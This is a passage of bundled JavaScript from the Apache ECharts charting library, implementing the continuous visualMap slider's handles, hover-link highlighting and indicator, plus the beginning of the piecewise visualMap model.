this._orient;\n\n        /**\n         * @private\n         */\n        this._useHandle;\n\n        /**\n         * @private\n         */\n        this._hoverLinkDataIndices = [];\n\n        /**\n         * @private\n         */\n        this._dragging;\n\n        /**\n         * @private\n         */\n        this._hovering;\n    },\n\n    /**\n     * @protected\n     * @override\n     */\n    doRender: function (visualMapModel, ecModel, api, payload) {\n        if (!payload || payload.type !== 'selectDataRange' || payload.from !== this.uid) {\n            this._buildView();\n        }\n    },\n\n    /**\n     * @private\n     */\n    _buildView: function () {\n        this.group.removeAll();\n\n        var visualMapModel = this.visualMapModel;\n        var thisGroup = this.group;\n\n        this._orient = visualMapModel.get('orient');\n        this._useHandle = visualMapModel.get('calculable');\n\n        this._resetInterval();\n\n        this._renderBar(thisGroup);\n\n        var dataRangeText = visualMapModel.get('text');\n        this._renderEndsText(thisGroup, dataRangeText, 0);\n        this._renderEndsText(thisGroup, dataRangeText, 1);\n\n        // Do this for background size calculation.\n        this._updateView(true);\n\n        // After updating view, inner shapes is built completely,\n        // and then background can be rendered.\n        this.renderBackground(thisGroup);\n\n        // Real update view\n        this._updateView();\n\n        this._enableHoverLinkToSeries();\n        this._enableHoverLinkFromSeries();\n\n        this.positionGroup(thisGroup);\n    },\n\n    /**\n     * @private\n     */\n    _renderEndsText: function (group, dataRangeText, endsIndex) {\n        if (!dataRangeText) {\n            return;\n        }\n\n        // Compatible with ec2, text[0] map to high value, text[1] map low value.\n        var text = dataRangeText[1 - endsIndex];\n        text = text != null ? text + '' : '';\n\n        var visualMapModel = this.visualMapModel;\n        var textGap = visualMapModel.get('textGap');\n        var itemSize = visualMapModel.itemSize;\n\n        var barGroup = this._shapes.barGroup;\n        var position = this._applyTransform(\n            [\n                itemSize[0] / 2,\n                endsIndex === 0 ? -textGap : itemSize[1] + textGap\n            ],\n            barGroup\n        );\n        var align = this._applyTransform(\n            endsIndex === 0 ? 'bottom' : 'top',\n            barGroup\n        );\n        var orient = this._orient;\n        var textStyleModel = this.visualMapModel.textStyleModel;\n\n        this.group.add(new Text({\n            style: {\n                x: position[0],\n                y: position[1],\n                textVerticalAlign: orient === 'horizontal' ? 'middle' : align,\n                textAlign: orient === 'horizontal' ? align : 'center',\n                text: text,\n                textFont: textStyleModel.getFont(),\n                textFill: textStyleModel.getTextColor()\n            }\n        }));\n    },\n\n    /**\n     * @private\n     */\n    _renderBar: function (targetGroup) {\n        var visualMapModel = this.visualMapModel;\n        var shapes = this._shapes;\n        var itemSize = visualMapModel.itemSize;\n        var orient = this._orient;\n        var useHandle = this._useHandle;\n        var itemAlign = getItemAlign(visualMapModel, this.api, itemSize);\n        var barGroup = shapes.barGroup = this._createBarGroup(itemAlign);\n\n        // Bar\n        barGroup.add(shapes.outOfRange = createPolygon());\n        barGroup.add(shapes.inRange = createPolygon(\n            null,\n            useHandle ? getCursor$1(this._orient) : null,\n            bind(this._dragHandle, this, 'all', false),\n            bind(this._dragHandle, this, 'all', true)\n        ));\n\n        var textRect = visualMapModel.textStyleModel.getTextRect('国');\n        var textSize = mathMax$8(textRect.width, textRect.height);\n\n        // Handle\n        if (useHandle) {\n            shapes.handleThumbs = [];\n            shapes.handleLabels = [];\n            shapes.handleLabelPoints = [];\n\n            this._createHandle(barGroup, 0, itemSize, textSize, orient, itemAlign);\n            this._createHandle(barGroup, 1, itemSize, textSize, orient, itemAlign);\n        }\n\n        this._createIndicator(barGroup, itemSize, textSize, orient);\n\n        targetGroup.add(barGroup);\n    },\n\n    /**\n     * @private\n     */\n    _createHandle: function (barGroup, handleIndex, itemSize, textSize, orient) {\n        var onDrift = bind(this._dragHandle, this, handleIndex, false);\n        var onDragEnd = bind(this._dragHandle, this, handleIndex, true);\n        var handleThumb = createPolygon(\n            createHandlePoints(handleIndex, textSize),\n            getCursor$1(this._orient),\n            onDrift,\n            onDragEnd\n        );\n        handleThumb.position[0] = itemSize[0];\n        barGroup.add(handleThumb);\n\n        // Text is always horizontal layout but should not be effected by\n        // transform (orient/inverse). So label is built separately but not\n        // use zrender/graphic/helper/RectText, and is located based on view\n        // group (according to handleLabelPoint) but not barGroup.\n        var textStyleModel = this.visualMapModel.textStyleModel;\n        var handleLabel = new Text({\n            draggable: true,\n            drift: onDrift,\n            onmousemove: function (e) {\n                // Fot mobile devicem, prevent screen slider on the button.\n                stop(e.event);\n            },\n            ondragend: onDragEnd,\n            style: {\n                x: 0, y: 0, text: '',\n                textFont: textStyleModel.getFont(),\n                textFill: textStyleModel.getTextColor()\n            }\n        });\n        this.group.add(handleLabel);\n\n        var handleLabelPoint = [\n            orient === 'horizontal'\n                ? textSize / 2\n                : textSize * 1.5,\n            orient === 'horizontal'\n                ? (handleIndex === 0 ? -(textSize * 1.5) : (textSize * 1.5))\n                : (handleIndex === 0 ? -textSize / 2 : textSize / 2)\n        ];\n\n        var shapes = this._shapes;\n        shapes.handleThumbs[handleIndex] = handleThumb;\n        shapes.handleLabelPoints[handleIndex] = handleLabelPoint;\n        shapes.handleLabels[handleIndex] = handleLabel;\n    },\n\n    /**\n     * @private\n     */\n    _createIndicator: function (barGroup, itemSize, textSize, orient) {\n        var indicator = createPolygon([[0, 0]], 'move');\n        indicator.position[0] = itemSize[0];\n        indicator.attr({invisible: true, silent: true});\n        barGroup.add(indicator);\n\n        var textStyleModel = this.visualMapModel.textStyleModel;\n        var indicatorLabel = new Text({\n            silent: true,\n            invisible: true,\n            style: {\n                x: 0, y: 0, text: '',\n                textFont: textStyleModel.getFont(),\n                textFill: textStyleModel.getTextColor()\n            }\n        });\n        this.group.add(indicatorLabel);\n\n        var indicatorLabelPoint = [\n            orient === 'horizontal' ? textSize / 2 : HOVER_LINK_OUT + 3,\n            0\n        ];\n\n        var shapes = this._shapes;\n        shapes.indicator = indicator;\n        shapes.indicatorLabel = indicatorLabel;\n        shapes.indicatorLabelPoint = indicatorLabelPoint;\n    },\n\n    /**\n     * @private\n     */\n    _dragHandle: function (handleIndex, isEnd, dx, dy) {\n        if (!this._useHandle) {\n            return;\n        }\n\n        this._dragging = !isEnd;\n\n        if (!isEnd) {\n            // Transform dx, dy to bar coordination.\n            var vertex = this._applyTransform([dx, dy], this._shapes.barGroup, true);\n            this._updateInterval(handleIndex, vertex[1]);\n\n            // Considering realtime, update view should be executed\n            // before dispatch action.\n            this._updateView();\n        }\n\n        // dragEnd do not dispatch action when realtime.\n        if (isEnd === !this.visualMapModel.get('realtime')) { // jshint ignore:line\n            this.api.dispatchAction({\n                type: 'selectDataRange',\n                from: this.uid,\n                visualMapId: this.visualMapModel.id,\n                selected: this._dataInterval.slice()\n            });\n        }\n\n        if (isEnd) {\n            !this._hovering && this._clearHoverLinkToSeries();\n        }\n        else if (useHoverLinkOnHandle(this.visualMapModel)) {\n            this._doHoverLinkToSeries(this._handleEnds[handleIndex], false);\n        }\n    },\n\n    /**\n     * @private\n     */\n    _resetInterval: function () {\n        var visualMapModel = this.visualMapModel;\n\n        var dataInterval = this._dataInterval = visualMapModel.getSelected();\n        var dataExtent = visualMapModel.getExtent();\n        var sizeExtent = [0, visualMapModel.itemSize[1]];\n\n        this._handleEnds = [\n            linearMap$3(dataInterval[0], dataExtent, sizeExtent, true),\n            linearMap$3(dataInterval[1], dataExtent, sizeExtent, true)\n        ];\n    },\n\n    /**\n     * @private\n     * @param {(number|string)} handleIndex 0 or 1 or 'all'\n     * @param {number} dx\n     * @param {number} dy\n     */\n    _updateInterval: function (handleIndex, delta) {\n        delta = delta || 0;\n        var visualMapModel = this.visualMapModel;\n        var handleEnds = this._handleEnds;\n        var sizeExtent = [0, visualMapModel.itemSize[1]];\n\n        sliderMove(\n            delta,\n            handleEnds,\n            sizeExtent,\n            handleIndex,\n            // cross is forbiden\n            0\n        );\n\n        var dataExtent = visualMapModel.getExtent();\n        // Update data interval.\n        this._dataInterval = [\n            linearMap$3(handleEnds[0], sizeExtent, dataExtent, true),\n            linearMap$3(handleEnds[1], sizeExtent, dataExtent, true)\n        ];\n    },\n\n    /**\n     * @private\n     */\n    _updateView: function (forSketch) {\n        var visualMapModel = this.visualMapModel;\n        var dataExtent = visualMapModel.getExtent();\n        var shapes = this._shapes;\n\n        var outOfRangeHandleEnds = [0, visualMapModel.itemSize[1]];\n        var inRangeHandleEnds = forSketch ? outOfRangeHandleEnds : this._handleEnds;\n\n        var visualInRange = this._createBarVisual(\n            this._dataInterval, dataExtent, inRangeHandleEnds, 'inRange'\n        );\n        var visualOutOfRange = this._createBarVisual(\n            dataExtent, dataExtent, outOfRangeHandleEnds, 'outOfRange'\n        );\n\n        shapes.inRange\n            .setStyle({\n                fill: visualInRange.barColor,\n                opacity: visualInRange.opacity\n            })\n            .setShape('points', visualInRange.barPoints);\n        shapes.outOfRange\n            .setStyle({\n                fill: visualOutOfRange.barColor,\n                opacity: visualOutOfRange.opacity\n            })\n            .setShape('points', visualOutOfRange.barPoints);\n\n        this._updateHandle(inRangeHandleEnds, visualInRange);\n    },\n\n    /**\n     * @private\n     */\n    _createBarVisual: function (dataInterval, dataExtent, handleEnds, forceState) {\n        var opts = {\n            forceState: forceState,\n            convertOpacityToAlpha: true\n        };\n        var colorStops = this._makeColorGradient(dataInterval, opts);\n\n        var symbolSizes = [\n            this.getControllerVisual(dataInterval[0], 'symbolSize', opts),\n            this.getControllerVisual(dataInterval[1], 'symbolSize', opts)\n        ];\n        var barPoints = this._createBarPoints(handleEnds, symbolSizes);\n\n        return {\n            barColor: new LinearGradient(0, 0, 0, 1, colorStops),\n            barPoints: barPoints,\n            handlesColor: [\n                colorStops[0].color,\n                colorStops[colorStops.length - 1].color\n            ]\n        };\n    },\n\n    /**\n     * @private\n     */\n    _makeColorGradient: function (dataInterval, opts) {\n        // Considering colorHue, which is not linear, so we have to sample\n        // to calculate gradient color stops, but not only caculate head\n        // and tail.\n        var sampleNumber = 100; // Arbitrary value.\n        var colorStops = [];\n        var step = (dataInterval[1] - dataInterval[0]) / sampleNumber;\n\n        colorStops.push({\n            color: this.getControllerVisual(dataInterval[0], 'color', opts),\n            offset: 0\n        });\n\n        for (var i = 1; i < sampleNumber; i++) {\n            var currValue = dataInterval[0] + step * i;\n            if (currValue > dataInterval[1]) {\n                break;\n            }\n            colorStops.push({\n                color: this.getControllerVisual(currValue, 'color', opts),\n                offset: i / sampleNumber\n            });\n        }\n\n        colorStops.push({\n            color: this.getControllerVisual(dataInterval[1], 'color', opts),\n            offset: 1\n        });\n\n        return colorStops;\n    },\n\n    /**\n     * @private\n     */\n    _createBarPoints: function (handleEnds, symbolSizes) {\n        var itemSize = this.visualMapModel.itemSize;\n\n        return [\n            [itemSize[0] - symbolSizes[0], handleEnds[0]],\n            [itemSize[0], handleEnds[0]],\n            [itemSize[0], handleEnds[1]],\n            [itemSize[0] - symbolSizes[1], handleEnds[1]]\n        ];\n    },\n\n    /**\n     * @private\n     */\n    _createBarGroup: function (itemAlign) {\n        var orient = this._orient;\n        var inverse = this.visualMapModel.get('inverse');\n\n        return new Group(\n            (orient === 'horizontal' && !inverse)\n            ? {scale: itemAlign === 'bottom' ? [1, 1] : [-1, 1], rotation: Math.PI / 2}\n            : (orient === 'horizontal' && inverse)\n            ? {scale: itemAlign === 'bottom' ? [-1, 1] : [1, 1], rotation: -Math.PI / 2}\n            : (orient === 'vertical' && !inverse)\n            ? {scale: itemAlign === 'left' ? [1, -1] : [-1, -1]}\n            : {scale: itemAlign === 'left' ? [1, 1] : [-1, 1]}\n        );\n    },\n\n    /**\n     * @private\n     */\n    _updateHandle: function (handleEnds, visualInRange) {\n        if (!this._useHandle) {\n            return;\n        }\n\n        var shapes = this._shapes;\n        var visualMapModel = this.visualMapModel;\n        var handleThumbs = shapes.handleThumbs;\n        var handleLabels = shapes.handleLabels;\n\n        each$29([0, 1], function (handleIndex) {\n            var handleThumb = handleThumbs[handleIndex];\n            handleThumb.setStyle('fill', visualInRange.handlesColor[handleIndex]);\n            handleThumb.position[1] = handleEnds[handleIndex];\n\n            // Update handle label position.\n            var textPoint = applyTransform$1(\n                shapes.handleLabelPoints[handleIndex],\n                getTransform(handleThumb, this.group)\n            );\n            handleLabels[handleIndex].setStyle({\n                x: textPoint[0],\n                y: textPoint[1],\n                text: visualMapModel.formatValueText(this._dataInterval[handleIndex]),\n                textVerticalAlign: 'middle',\n                textAlign: this._applyTransform(\n                    this._orient === 'horizontal'\n                        ? (handleIndex === 0 ? 'bottom' : 'top')\n                        : 'left',\n                    shapes.barGroup\n                )\n            });\n        }, this);\n    },\n\n    /**\n     * @private\n     * @param {number} cursorValue\n     * @param {number} textValue\n     * @param {string} [rangeSymbol]\n     * @param {number} [halfHoverLinkSize]\n     */\n    _showIndicator: function (cursorValue, textValue, rangeSymbol, halfHoverLinkSize) {\n        var visualMapModel = this.visualMapModel;\n        var dataExtent = visualMapModel.getExtent();\n        var itemSize = visualMapModel.itemSize;\n        var sizeExtent = [0, itemSize[1]];\n        var pos = linearMap$3(cursorValue, dataExtent, sizeExtent, true);\n\n        var shapes = this._shapes;\n        var indicator = shapes.indicator;\n        if (!indicator) {\n            return;\n        }\n\n        indicator.position[1] = pos;\n        indicator.attr('invisible', false);\n        indicator.setShape('points', createIndicatorPoints(\n            !!rangeSymbol, halfHoverLinkSize, pos, itemSize[1]\n        ));\n\n        var opts = {convertOpacityToAlpha: true};\n        var color = this.getControllerVisual(cursorValue, 'color', opts);\n        indicator.setStyle('fill', color);\n\n        // Update handle label position.\n        var textPoint = applyTransform$1(\n            shapes.indicatorLabelPoint,\n            getTransform(indicator, this.group)\n        );\n\n        var indicatorLabel = shapes.indicatorLabel;\n        indicatorLabel.attr('invisible', false);\n        var align = this._applyTransform('left', shapes.barGroup);\n        var orient = this._orient;\n        indicatorLabel.setStyle({\n            text: (rangeSymbol ? rangeSymbol : '') + visualMapModel.formatValueText(textValue),\n            textVerticalAlign: orient === 'horizontal' ? align : 'middle',\n            textAlign: orient === 'horizontal' ? 'center' : align,\n            x: textPoint[0],\n            y: textPoint[1]\n        });\n    },\n\n    /**\n     * @private\n     */\n    _enableHoverLinkToSeries: function () {\n        var self = this;\n        this._shapes.barGroup\n\n            .on('mousemove', function (e) {\n                self._hovering = true;\n\n                if (!self._dragging) {\n                    var itemSize = self.visualMapModel.itemSize;\n                    var pos = self._applyTransform(\n                        [e.offsetX, e.offsetY], self._shapes.barGroup, true, true\n                    );\n                    // For hover link show when hover handle, which might be\n                    // below or upper than sizeExtent.\n                    pos[1] = mathMin$8(mathMax$8(0, pos[1]), itemSize[1]);\n                    self._doHoverLinkToSeries(\n                        pos[1],\n                        0 <= pos[0] && pos[0] <= itemSize[0]\n                    );\n                }\n            })\n\n            .on('mouseout', function () {\n                // When mouse is out of handle, hoverLink still need\n                // to be displayed when realtime is set as false.\n                self._hovering = false;\n                !self._dragging && self._clearHoverLinkToSeries();\n            });\n    },\n\n    /**\n     * @private\n     */\n    _enableHoverLinkFromSeries: function () {\n        var zr = this.api.getZr();\n\n        if (this.visualMapModel.option.hoverLink) {\n            zr.on('mouseover', this._hoverLinkFromSeriesMouseOver, this);\n            zr.on('mouseout', this._hideIndicator, this);\n        }\n        else {\n            this._clearHoverLinkFromSeries();\n        }\n    },\n\n    /**\n     * @private\n     */\n    _doHoverLinkToSeries: function (cursorPos, hoverOnBar) {\n        var visualMapModel = this.visualMapModel;\n        var itemSize = visualMapModel.itemSize;\n\n        if (!visualMapModel.option.hoverLink) {\n            return;\n        }\n\n        var sizeExtent = [0, itemSize[1]];\n        var dataExtent = visualMapModel.getExtent();\n\n        // For hover link show when hover handle, which might be below or upper than sizeExtent.\n        cursorPos = mathMin$8(mathMax$8(sizeExtent[0], cursorPos), sizeExtent[1]);\n\n        var halfHoverLinkSize = getHalfHoverLinkSize(visualMapModel, dataExtent, sizeExtent);\n        var hoverRange = [cursorPos - halfHoverLinkSize, cursorPos + halfHoverLinkSize];\n        var cursorValue = linearMap$3(cursorPos, sizeExtent, dataExtent, true);\n        var valueRange = [\n            linearMap$3(hoverRange[0], sizeExtent, dataExtent, true),\n            linearMap$3(hoverRange[1], sizeExtent, dataExtent, true)\n        ];\n        // Consider data range is out of visualMap range, see test/visualMap-continuous.html,\n        // where china and india has very large population.\n        hoverRange[0] < sizeExtent[0] && (valueRange[0] = -Infinity);\n        hoverRange[1] > sizeExtent[1] && (valueRange[1] = Infinity);\n\n        // Do not show indicator when mouse is over handle,\n        // otherwise labels overlap, especially when dragging.\n        if (hoverOnBar) {\n            if (valueRange[0] === -Infinity) {\n                this._showIndicator(cursorValue, valueRange[1], '< ', halfHoverLinkSize);\n            }\n            else if (valueRange[1] === Infinity) {\n                this._showIndicator(cursorValue, valueRange[0], '> ', halfHoverLinkSize);\n            }\n            else {\n                this._showIndicator(cursorValue, cursorValue, '≈ ', halfHoverLinkSize);\n            }\n        }\n\n        // When realtime is set as false, handles, which are in barGroup,\n        // also trigger hoverLink, which help user to realize where they\n        // focus on when dragging. (see test/heatmap-large.html)\n        // When realtime is set as true, highlight will not show when hover\n        // handle, because the label on handle, which displays a exact value\n        // but not range, might mislead users.\n        var oldBatch = this._hoverLinkDataIndices;\n        var newBatch = [];\n        if (hoverOnBar || useHoverLinkOnHandle(visualMapModel)) {\n            newBatch = this._hoverLinkDataIndices = visualMapModel.findTargetDataIndices(valueRange);\n        }\n\n        var resultBatches = compressBatches(oldBatch, newBatch);\n\n        this._dispatchHighDown('downplay', makeHighDownBatch(resultBatches[0], visualMapModel));\n        this._dispatchHighDown('highlight', makeHighDownBatch(resultBatches[1], visualMapModel));\n    },\n\n    /**\n     * @private\n     */\n    _hoverLinkFromSeriesMouseOver: function (e) {\n        var el = e.target;\n        var visualMapModel = this.visualMapModel;\n\n        if (!el || el.dataIndex == null) {\n            return;\n        }\n\n        var dataModel = this.ecModel.getSeriesByIndex(el.seriesIndex);\n\n        if (!visualMapModel.isTargetSeries(dataModel)) {\n            return;\n        }\n\n        var data = dataModel.getData(el.dataType);\n        var value = data.get(visualMapModel.getDataDimension(data), el.dataIndex, true);\n\n        if (!isNaN(value)) {\n            this._showIndicator(value, value);\n        }\n    },\n\n    /**\n     * @private\n     */\n    _hideIndicator: function () {\n        var shapes = this._shapes;\n        shapes.indicator && shapes.indicator.attr('invisible', true);\n        shapes.indicatorLabel && shapes.indicatorLabel.attr('invisible', true);\n    },\n\n    /**\n     * @private\n     */\n    _clearHoverLinkToSeries: function () {\n        this._hideIndicator();\n\n        var indices = this._hoverLinkDataIndices;\n        this._dispatchHighDown('downplay', makeHighDownBatch(indices, this.visualMapModel));\n\n        indices.length = 0;\n    },\n\n    /**\n     * @private\n     */\n    _clearHoverLinkFromSeries: function () {\n        this._hideIndicator();\n\n        var zr = this.api.getZr();\n        zr.off('mouseover', this._hoverLinkFromSeriesMouseOver);\n        zr.off('mouseout', this._hideIndicator);\n    },\n\n    /**\n     * @private\n     */\n    _applyTransform: function (vertex, element, inverse, global) {\n        var transform = getTransform(element, global ? null : this.group);\n\n        return graphic[\n            isArray(vertex) ? 'applyTransform' : 'transformDirection'\n        ](vertex, transform, inverse);\n    },\n\n    /**\n     * @private\n     */\n    _dispatchHighDown: function (type, batch) {\n        batch && batch.length && this.api.dispatchAction({\n            type: type,\n            batch: batch\n        });\n    },\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        this._clearHoverLinkFromSeries();\n        this._clearHoverLinkToSeries();\n    },\n\n    /**\n     * @override\n     */\n    remove: function () {\n        this._clearHoverLinkFromSeries();\n        this._clearHoverLinkToSeries();\n    }\n\n});\n\nfunction createPolygon(points, cursor, onDrift, onDragEnd) {\n    return new Polygon({\n        shape: {points: points},\n        draggable: !!onDrift,\n        cursor: cursor,\n        drift: onDrift,\n        onmousemove: function (e) {\n            // Fot mobile devicem, prevent screen slider on the button.\n            stop(e.event);\n        },\n        ondragend: onDragEnd\n    });\n}\n\nfunction createHandlePoints(handleIndex, textSize) {\n    return handleIndex === 0\n        ? [[0, 0], [textSize, 0], [textSize, -textSize]]\n        : [[0, 0], [textSize, 0], [textSize, textSize]];\n}\n\nfunction createIndicatorPoints(isRange, halfHoverLinkSize, pos, extentMax) {\n    return isRange\n        ? [ // indicate range\n            [0, -mathMin$8(halfHoverLinkSize, mathMax$8(pos, 0))],\n            [HOVER_LINK_OUT, 0],\n            [0, mathMin$8(halfHoverLinkSize, mathMax$8(extentMax - pos, 0))]\n        ]\n        : [ // indicate single value\n            [0, 0], [5, -5], [5, 5]\n        ];\n}\n\nfunction getHalfHoverLinkSize(visualMapModel, dataExtent, sizeExtent) {\n    var halfHoverLinkSize = HOVER_LINK_SIZE / 2;\n    var hoverLinkDataSize = visualMapModel.get('hoverLinkDataSize');\n    if (hoverLinkDataSize) {\n        halfHoverLinkSize = linearMap$3(hoverLinkDataSize, dataExtent, sizeExtent, true) / 2;\n    }\n    return halfHoverLinkSize;\n}\n\nfunction useHoverLinkOnHandle(visualMapModel) {\n    var hoverLinkOnHandle = visualMapModel.get('hoverLinkOnHandle');\n    return !!(hoverLinkOnHandle == null ? visualMapModel.get('realtime') : hoverLinkOnHandle);\n}\n\nfunction getCursor$1(orient) {\n    return orient === 'vertical' ? 'ns-resize' : 'ew-resize';\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar actionInfo$2 = {\n    type: 'selectDataRange',\n    event: 'dataRangeSelected',\n    // FIXME use updateView appears wrong\n    update: 'update'\n};\n\nregisterAction(actionInfo$2, function (payload, ecModel) {\n\n    ecModel.eachComponent({mainType: 'visualMap', query: payload}, function (model) {\n        model.setSelected(payload.selected);\n    });\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * DataZoom component entry\n */\n\nregisterPreprocessor(preprocessor$3);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PiecewiseModel = VisualMapModel.extend({\n\n    type: 'visualMap.piecewise',\n\n    /**\n     * Order Rule:\n     *\n     * option.categories / option.pieces / option.text / option.selected:\n     *     If !option.inverse,\n     *     Order when vertical: ['top', ..., 'bottom'].\n     *     Order when horizontal: ['left', ..., 'right'].\n     *     If option.inverse, the meaning of\n     *     the order should be reversed.\n     *\n     * this._pieceList:\n     *     The order is always [low, ..., high].\n     *\n     * Mapping from location to low-high:\n     *     If !option.inverse\n     *     When vertical, top is high.\n     *     When horizontal, right is high.\n     *     If option.inverse, reverse.\n     */\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        selected: null,             // Object. If not specified, means selected.\n                                    // When pieces and splitNumber: {'0': true, '5': true}\n                                    // When categories: {'cate1': false, 'cate3': true}\n                                    // When selected === false, means all unselected.\n\n        minOpen: false,             // Whether include values that smaller than `min`.\n        maxOpen: false,             // Whether include values that bigger than `max`.\n\n        align: 'auto',              // 'auto', 'left', 'right'\n        itemWidth: 20,              // When put the controller vertically, it is the length of\n                                    // horizontal side of each item. Otherwise, vertical side.\n        itemHeight: 14,             // When put the controller vertically, it is the length of\n                                    // vertical side of each item. Otherwise, horizontal side.\n        itemSymbol: 'roundRect',\n        pieceList: null,            // Each item is Object, with some of those attrs:\n                                    // {min, max, lt, gt, lte, gte, value,\n                                    // color, colorSaturation, colorAlpha, opacity,\n                                    // symbol, symbolSize}, which customize the range or visual\n                                    // coding of the certain piece. Besides, see \"Order Rule\".\n        categories: null,           // category names, like: ['some1', 'some2', 'some3'].\n                                    // Attr min/max are ignored when categories set. See \"Order Rule\"\n        splitNumber: 5,             // If set to 5, auto split five pieces equally.\n                                    // If set to 0 and component type not set, component type will be\n                                    // determined as \"continuous\". (It is less reasonable but for ec2\n                                    // compatibility, see echarts/component/visualMap/typeDefaulter)\n        selectedMode: 'multiple',   // Can be 'multiple' or 'single'.\n        itemGap: 10,                // The gap between two items, in px.\n        hoverLink: true,            // Enable hover highlight.\n\n        showLabel: null             // By default, when text is used, label will hide (the logic\n                                    // is remained for compatibility reason)\n    },\n\n    /**\n     * @override\n     */\n    optionUpdated: function (newOption, isInit) {\n        PiecewiseModel.superApply(this, 'optionUpdated', arguments);\n\n        /**\n         * The order is always [low, ..., high].\n         * [{text: string, interval: Array.<number>}, ...]\n         * @private\n         * @type {Array.<Object>}\n         */\n        this._pieceList = [];\n\n        this.resetExtent();\n\n        /**\n         * 'pieces', 'categories', 'splitNumber'\n         * @type {string}\n         */\n        var mode = this._mode = this._determineMode();\n\n        resetMethods[this._mode].call(this);\n\n        this._resetSelected(newOption, isInit);\n\n        var categories = this.option.categories;\n\n        this.resetVisual(function (mappingOption, state) {\n            if (mode === 'categories') {\n                mappingOption.mappingMethod = 'category';\n                mappingOption.categories = clone(categories);\n            }\n            else {\n                mappingOption.dataExtent = this.getExtent();\n                mappingOption.mappingMethod = 'piecewise';\n                mappingOption.pieceList = map(this._pieceList, function (piece) {\n                    var piece = clone(piece);\n                    if (state !== 'inRange') {\n                        // FIXME\n                        // outOfRange do not support special visual in pieces.\n                        piece.visual = null;\n                    }\n                    return piece;\n                });\n            }\n        });\n    },\n\n    /**\n     * @protected\n     * @override\n     */\n    completeVisualOption: function () {\n        // Consider this case:\n        // visualMap: {\n        //      pieces: [{symbol: 'circle', lt: 0}, {symbol: 'rect', gte: 0}]\n        // }\n        // where no inRange/outOfRange set but only pieces. So we should make\n        // default inRange/outOfRange for this case, otherwise visuals that only\n        // appear in `pieces` will not be taken into account in visual encoding.\n\n        var option = this.option;\n        var visualTypesInPieces = {};\n        var visualTypes = VisualMapping.listVisualTypes();\n        var isCategory = this.isCategory();\n\n        each$1(option.pieces, function (piece) {\n            each$1(visualTypes, function (visualType) {\n                if (piece.hasOwnProperty(visualType)) {\n                    visualTypesInPieces[visualType] = 1;\n                }\n            });\n        });\n\n        each$1(visualTypesInPieces, function (v, visualType) {\n            var exists = 0;\n            each$1(this.stateList, function (state) {\n                exists |= has(option, state, visualType)\n                    || has(option.target, state, visualType);\n            }, this);\n\n            !exists && each$1(this.stateList, function (state) {\n                (option[state] || (option[state] = {}))[visualType] = visualDefault.get(\n                    visualType, state === 'inRange' ? 'active' : 'inactive', isCategory\n                );\n            });\n        }, this);\n\n        function has(obj, state, visualType) {\n            return obj && obj[state] && (\n                isObject$1(obj[state])\n                    ? obj[state].hasOwnProperty(visualType)\n                    : obj[state] === visualType // e.g., inRange: 'symbol'\n            );\n        }\n\n        VisualMapModel.prototype.completeVisualOption.apply(this, arguments);\n    },\n\n    _resetSelected: function (newOption, isInit) {\n        var thisOption = this.option;\n        var pieceList = this._pieceList;\n\n        // Selected do not merge but all override.\n        var selected = (isInit ? thisOption : newOption).selected || {};\n        thisOption.selected = selected;\n\n        // Consider 'not specified' means true.\n        each$1(pieceList, function (piece, index) {\n            var key = this.getSelectedMapKey(piece);\n            if (!selected.hasOwnProperty(key)) {\n                selected[key] = true;\n            }\n        }, this);\n\n        if (thisOption.selectedMode === 'single') {\n            // Ensure there is only one selected.\n            var hasSel = false;\n\n            each$1(pieceList, function (piece, index) {\n                var key = this.getSelectedMapKey(piece);\n                if (selected[key]) {\n                    hasSel\n                        ? (selected[key] = false)\n                        : (hasSel = true);\n                }\n            }, this);\n        }\n        // thisOption.selectedMode === 'multiple', default: all selected.\n    },\n\n    /**\n     * @public\n     */\n    getSelectedMapKey: function (piece) {\n        return this._mode === 'categories'\n            ? piece.value + '' : piece.index + '';\n    },\n\n    /**\n     * @public\n     */\n    getPieceList: function () {\n        return this._pieceList;\n    },\n\n    /**\n     * @private\n     * @return {string}\n     */\n    _determineMode: function () {\n        var option = this.option;\n\n        return option.pieces && option.pieces.length > 0\n            ? 'pieces'\n            : this.option.categories\n            ? 'categories'\n            : 'splitNumber';\n    },\n\n    /**\n     * @public\n     * @override\n     */\n    setSelected: function (selected) {\n        this.option.selected = clone(selected);\n    },\n\n    /**\n     * @public\n     * @override\n     */\n    getValueState: function (value) {\n        var index = VisualMapping.findPieceIndex(value, this._pieceList);\n\n        return index != null\n            ? (this.option.selected[this.getSelectedMapKey(this._pieceList[index])]\n                ? 'inRange' : 'outOfRange'\n            )\n            : 'outOfRange';\n    },\n\n    /**\n     * @public\n     * @params {number} pieceIndex piece index in visualMapModel.getPieceList()\n     * @return {Array.<Object>} [{seriesId, 